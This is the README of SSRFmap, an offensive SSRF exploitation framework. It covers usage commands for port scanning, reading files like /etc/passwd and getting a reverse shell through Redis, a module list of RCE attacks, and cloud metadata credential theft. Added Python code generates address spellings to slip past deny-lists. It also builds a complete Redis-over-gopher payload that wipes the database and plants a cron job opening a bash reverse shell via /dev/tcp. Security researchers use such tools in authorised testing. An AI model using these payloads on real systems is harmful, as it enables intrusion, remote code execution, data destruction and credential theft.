SSRFmap
Server Side Request Forgery (SSRF) is a vulnerability in which an attacker forces a server to perform requests on their behalf. SSRF is often used to reach internal services that are not exposed directly and to trigger actions on them; this framework aims to find and exploit those services easily. SSRFmap takes a Burp request file as input and the name of the parameter to fuzz.
Guide / RTFM
```
usage: ssrfmap.py [-h] [-r REQFILE] [-p PARAM] [-m MODULES] [-l HANDLER]
                  [--lhost LHOST] [--lport LPORT]

optional arguments:
  -h, --help     show this help message and exit
  -r REQFILE     SSRF Request file
  -p PARAM       SSRF Parameter to target
  -m MODULES     SSRF Modules to enable
  -l HANDLER     Start a handler for a reverse shell
  --lhost LHOST  LHOST reverse shell
  --lport LPORT  LPORT reverse shell
```
The two typical ways to use this script are the following.

```
# Launch a portscan on localhost and read default files
python ssrfmap.py -r data/request.txt -p url -m readfiles,portscan

# Trigger a reverse shell through a Redis instance reached via the SSRF
python ssrfmap.py -r data/request.txt -p url -m redis --lhost=127.0.0.1 --lport=4242 -l 4242

# -l starts a listener for the reverse shell on the specified port
# --lhost and --lport work like in Metasploit: they are substituted into the reverse shell payload,
# so they must point at a host and port the target can reach
```
A quick way to test the framework is the deliberately vulnerable SSRF service in data/example.py:

```
FLASK_APP=data/example.py flask run &
python ssrfmap.py -r data/request.txt -p url -m readfiles
```
Modules
The following modules are already implemented and can be used with the -m argument (comma-separated to enable several at once).

Name | Description
---|---
fastcgi | FastCGI RCE
redis | Redis RCE
github | Github Enterprise RCE < 2.8.7
zabbix | Zabbix RCE
mysql | MySQL Command execution
smtp | SMTP send mail
portscan | Scan ports for the host
networkscan | HTTP Ping sweep over the network
readfiles | Read files such as /etc/passwd
Contribute
I <3 pull requests :) Feel free to add any feature listed below or a new service.

- --level arg - ability to tweak payloads in order to bypass some IDS/WAF, e.g. by rewriting the target address: 127.0.0.1 -> [::] -> 0000: -> ...
- AWS and other cloud providers - extract sensitive data from http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy and more
- sockserver - SSRF SOCKS proxy server - https://github.com/iamultra/ssrfsocks
- handle requests that carry a file in the requester
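The --level item above asks for alternative spellings of a target address that slip past naive deny-lists. The following is an added example (my own code, not part of SSRFmap; the helper names are mine) of how such variants can be generated for any IPv4 address, together with a normaliser that applies the lenient inet_aton parsing rules most libc resolvers use (decimal, hex, octal octets, fewer than four parts, IPv4-mapped IPv6) so each spelling can be checked to still denote the same host. It assumes that localhost resolves to 127.0.0.1, and it counts [::] and 0.0.0.0 as local because a connect() to the unspecified address reaches the local machine on Linux.

```python
import ipaddress
from typing import Optional


def _part(p: str) -> int:
    """Parse one dotted component the way inet_aton does: 0x.. hex, leading-0 octal, else decimal."""
    if p[:2].lower() == "0x":
        return int(p[2:], 16)
    if len(p) > 1 and p[0] == "0":
        return int(p, 8)
    return int(p, 10)


def inet_aton_like(s: str) -> Optional[str]:
    """Lenient IPv4 parser: 1 to 4 parts, the last part fills all remaining bytes.
    Returns a dotted quad, or None if the string is not an address under these rules."""
    try:
        parts = [_part(p) for p in s.split(".")]
    except ValueError:
        return None
    if not 1 <= len(parts) <= 4 or any(p < 0 for p in parts):
        return None
    n = 0
    for p in parts[:-1]:
        if p > 255:
            return None
        n = (n << 8) | p
    tail_bits = 8 * (5 - len(parts))          # 4 parts -> 8 bits, 1 part -> 32 bits
    if parts[-1] >= 1 << tail_bits:
        return None
    return str(ipaddress.IPv4Address((n << tail_bits) | parts[-1]))


def normalize_host(host: str) -> Optional[str]:
    """Map any of the spellings produced below back to a canonical IPv4 address."""
    h = host.strip("[]").lower()
    if h == "localhost":                        # assumption: the usual hosts-file entry
        return "127.0.0.1"
    if ":" in h:                                # IPv6 literal
        try:
            v6 = ipaddress.IPv6Address(h)
        except ValueError:
            return None
        if v6.ipv4_mapped is not None:
            return str(v6.ipv4_mapped)
        # ::1 is loopback; :: (unspecified) connects to the local host on Linux
        return "127.0.0.1" if (v6.is_loopback or v6.is_unspecified) else None
    return inet_aton_like(h)


def ipv4_variants(ip: str) -> list:
    """Alternative spellings of ip that lenient URL and socket parsers accept."""
    addr = ipaddress.IPv4Address(ip)
    n, o = int(addr), addr.packed
    variants = [
        ip,
        str(n),                                                 # decimal integer
        f"0x{n:08x}",                                           # single hex number
        ".".join(f"0{b:o}" for b in o),                         # octal octets
        f"[::ffff:{ip}]",                                       # IPv4-mapped IPv6
        f"[::ffff:{o[0]:02x}{o[1]:02x}:{o[2]:02x}{o[3]:02x}]",  # same, as hex groups
    ]
    if addr.is_loopback:
        variants += ["127.1", "0177.1", "[::1]", "[::]", "0.0.0.0", "localhost"]
    return variants


def reaches_local_host(host: str) -> bool:
    """True if the spelling ends up at the local machine (loopback or unspecified address)."""
    canon = normalize_host(host)
    if canon is None:
        return False
    a = ipaddress.IPv4Address(canon)
    return a.is_loopback or a.is_unspecified


if __name__ == "__main__":
    for v in ipv4_variants("127.0.0.1"):
        print(f"{v:28} -> {normalize_host(v)}  local={reaches_local_host(v)}")
```

The point of normalize_host is to reason about what the target's own parser will do, not what a deny-list sees: a filter that string-matches "127.0.0.1" and lets "2130706433" through has lost, because inet_aton on the back end turns both into the same socket address.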
The following code is a template if you wish to add a module interacting with a service.

```python
from core.utils import *
import logging

name = "servicename in lowercase"
description = "ServiceName RCE - What does it do"
author = "Name or pseudo of the author"


class exploit():
    def __init__(self, requester, args):
        logging.info("Module '{}' launched !".format(name))

        # Data for the service: where it listens on the target's network and
        # the raw protocol bytes to smuggle, percent-encoded for a gopher:// URL
        ip = "127.0.0.1"
        port = "6379"
        data = "*1%0d%0a$8%0d%0af[...]save%0d%0aquit%0d%0a"
        payload = wrapper_gopher(data, ip, port)

        # Handle args for the reverse shell: prompt when --lhost / --lport
        # were not given on the command line
        if args.lhost is None:
            payload = payload.replace("SERVER_HOST", input("Server Host: "))
        else:
            payload = payload.replace("SERVER_HOST", args.lhost)
        if args.lport is None:
            payload = payload.replace("SERVER_PORT", input("Server Port: "))
        else:
            payload = payload.replace("SERVER_PORT", args.lport)

        # Send the payload through the SSRF, in the parameter chosen with -p
        r = requester.do_request(args.param, payload)
```
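The template leaves the gopher encoding to the project's own wrapper_gopher helper in core.utils. The following is an added, self-contained example (my code, not SSRFmap's, and not a copy of wrapper_gopher; the function names and the cron spool path are my own assumptions) of what a Redis module has to produce: each command encoded as a RESP array, the whole byte stream percent-encoded behind a gopher://host:port/_ prefix so that the vulnerable server's HTTP client writes it verbatim to the Redis socket, and a decoder so the payload can be inspected offline before it is sent. It takes the reverse-shell host and port as arguments rather than substituting placeholders afterwards, because every RESP bulk string is prefixed with its byte length: replacing SERVER_HOST with an address of a different length after encoding would leave the length headers wrong and Redis would reject the stream.

```python
from urllib.parse import quote, unquote_to_bytes


def resp_encode(*args: str) -> bytes:
    """Encode one Redis command as a RESP array, exactly as redis-cli sends it."""
    out = b"*%d\r\n" % len(args)
    for arg in args:
        raw = arg.encode()
        out += b"$%d\r\n%s\r\n" % (len(raw), raw)   # bulk string: byte length, then bytes
    return out


def gopher_wrap(data: bytes, host: str, port: int) -> str:
    """Turn raw bytes into a gopher URL. The "_" after the slash is a dummy gopher item
    type; everything after it is percent-decoded and written to the TCP socket as-is."""
    return f"gopher://{host}:{port}/_" + quote(data, safe="")


def gopher_unwrap(url: str):
    """Inverse of gopher_wrap, to inspect a payload before firing it: (host, port, bytes)."""
    hostport, _, selector = url[len("gopher://"):].partition("/_")
    host, _, port = hostport.rpartition(":")
    return host, int(port), unquote_to_bytes(selector)


def redis_cron_payload(lhost: str, lport: int, cron_dir: str = "/var/spool/cron/",
                       cron_file: str = "root", redis_host: str = "127.0.0.1",
                       redis_port: int = 6379) -> str:
    """Build the well-known Redis persistence-to-cron chain as a gopher URL.
    Assumed target layout: Redis runs with enough rights to write into cron_dir.
    Destructive: FLUSHALL empties the instance so the dumped RDB file holds little
    besides the cron line; the blank lines make cron skip the binary RDB framing."""
    cron_line = f"\n\n* * * * * bash -i >& /dev/tcp/{lhost}/{lport} 0>&1\n\n"
    commands = [
        ("flushall",),
        ("set", "ssrfmap", cron_line),
        ("config", "set", "dir", cron_dir),
        ("config", "set", "dbfilename", cron_file),
        ("save",),
        ("quit",),
    ]
    stream = b"".join(resp_encode(*cmd) for cmd in commands)
    return gopher_wrap(stream, redis_host, redis_port)


if __name__ == "__main__":
    url = redis_cron_payload("10.0.0.1", 4242)
    print(url)
    host, port, stream = gopher_unwrap(url)
    print(f"-> {host}:{port}")
    print(stream.decode())
```

The URL this returns is what goes into the fuzzed parameter (args.param in the template) via requester.do_request; the -l listener on lport then catches the shell once cron fires, which can take up to a minute.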
You can also contribute with a beer IRL or with buymeacoffee.com
Thanks to the contributors
- ???